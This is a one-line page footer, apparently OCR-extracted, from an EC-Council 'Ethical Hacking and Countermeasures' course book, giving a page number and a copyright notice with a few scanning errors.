06 Page 1005 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.